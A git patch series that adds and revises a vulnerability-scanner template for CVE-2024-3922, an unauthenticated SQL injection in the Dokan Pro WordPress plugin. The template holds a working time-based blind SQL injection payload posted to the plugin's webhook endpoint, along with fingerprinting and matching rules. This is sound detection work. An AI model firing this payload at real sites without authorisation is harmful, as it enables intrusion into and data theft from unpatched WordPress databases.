From 0fca79694bc51ba05c08b0fd8685aac359714b42 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Sat, 15 Jun 2024 18:31:49 +0300 Subject: [PATCH 1/3] add cve-2024-3922 --- http/cves/2024/CVE-2024-3922.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3922.yaml diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml new file mode 100644 index 0000000000..c38b4e98aa --- /dev/null +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -0,0 +1,26 @@ +id: CVE-2024-3922 +info: + name: Dokan Pro <= 3.10.3 SQL Injection + author: securityforeveryone + severity: critical + description: | + The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 + - https://dokan.co/docs/wordpress/changelog/ + tags: cve,cve2024,dokan,wp-plugin + +http: + - raw: + - | + POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1 + Host: {{Hostname}} + + {"env":"1","event":"invoice.created","resource":{"subscription_code":"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='"}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 302' + condition: and From 197711ba5e196d086d3a0887ca10622c9466bba4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 14:05:07 +0530 Subject: [PATCH 2/3] minor update --- http/cves/2024/CVE-2024-3922.yaml | 28 +++++++++++++++++++++++++--- 1 file changed, 25 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index c38b4e98aa..1b902ca27b 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -1,18 +1,40 @@ id: CVE-2024-3922 + info: - name: Dokan Pro <= 3.10.3 SQL Injection + name: Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection author: securityforeveryone severity: critical description: | - The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. + impact: | + Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 3.11.0 reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 - https://dokan.co/docs/wordpress/changelog/ - tags: cve,cve2024,dokan,wp-plugin + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/dokan-pro/" + tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro + +flow: http(1) && http(2) http: - raw: - | + GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + words: + - 'Dokan product' + internal: true + + - raw: + - | + @timeout: 20s POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1 Host: {{Hostname}} From db61f8a095d7b8a2111fd5c178763cd5a8cde78e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 25 Jun 2024 13:21:11 +0530 Subject: [PATCH 3/3] updated info --- http/cves/2024/CVE-2024-3922.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index 1b902ca27b..b0552b2350 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -1,22 +1,23 @@ id: CVE-2024-3922 info: - name: Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection + name: Dokan Pro <= 3.10.3 - SQL Injection author: securityforeveryone severity: critical description: | The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. impact: | Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. - remediation: Fixed in 3.11.0 + remediation: | + Fixed in 3.11.0 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 - https://dokan.co/docs/wordpress/changelog/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-3922 metadata: verified: true - max-request: 1 + max-request: 2 publicwww-query: "/wp-content/plugins/dokan-pro/" - tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro + tags: cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli flow: http(1) && http(2)